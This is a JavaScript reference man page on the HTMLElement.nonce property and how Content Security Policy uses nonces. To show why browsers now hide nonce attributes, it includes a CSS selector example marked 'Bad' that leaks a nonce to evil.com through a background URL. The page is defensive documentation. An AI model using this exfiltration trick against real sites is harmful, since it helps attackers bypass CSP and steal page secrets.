.\" Automatically generated by Pandoc 3.6.2
.\"
.TH "HTMLElement.nonce" "JS" "April 7, 2023" "JavaScript" "JavaScript Reference Manual"
.SH NAME
HTMLElement.nonce \- HTMLElement: nonce property
.SH SYNOPSIS
The \f[B]\f[CB]nonce\f[B]\f[R] property of the \f[CR]HTMLElement\f[R]
interface returns the cryptographic number used once that is used by
Content Security Policy to determine whether a given fetch will be
allowed to proceed.
.PP
In later implementations, elements only expose their \f[CR]nonce\f[R]
attribute to scripts (and not to side\-channels like CSS attribute
selectors).
.SH EXAMPLES
.SS Retrieving a nonce value
In the past, not all browsers supported the \f[CR]nonce\f[R] IDL
attribute, so a workaround is to try to use \f[CR]getAttribute\f[R] as a
fallback:
.IP
.EX
\f[B]let\f[R] nonce = script[\[dq]nonce\[dq]] || script.getAttribute(\[dq]nonce\[dq]);
.EE
.PP
However, recent browsers version hide \f[CR]nonce\f[R] values that are
accessed this way (an empty string will be returned).
The IDL property (\f[CR]script[\[aq]nonce\[aq]]\f[R]) will be the only
way to access nonces.
.PP
Nonce hiding helps prevent attackers from exfiltrating nonce data via
mechanisms that can grab data from content attributes like this CSS
selector:
.PP
\f[B]Bad\f[R]
.IP
.EX
script[nonce\[ti]=\[dq]whatever\[dq]] {
  \f[B]background\f[R]: url(\[dq]https://evil.com/nonce?whatever\[dq]);
}
.EE
.SH SEE ALSO
.IP \[bu] 2
\f[CR]nonce\f[R] global attribute
.IP \[bu] 2
Content Security Policy
.IP \[bu] 2
CSP: \f[CR]script\-src\f[R]
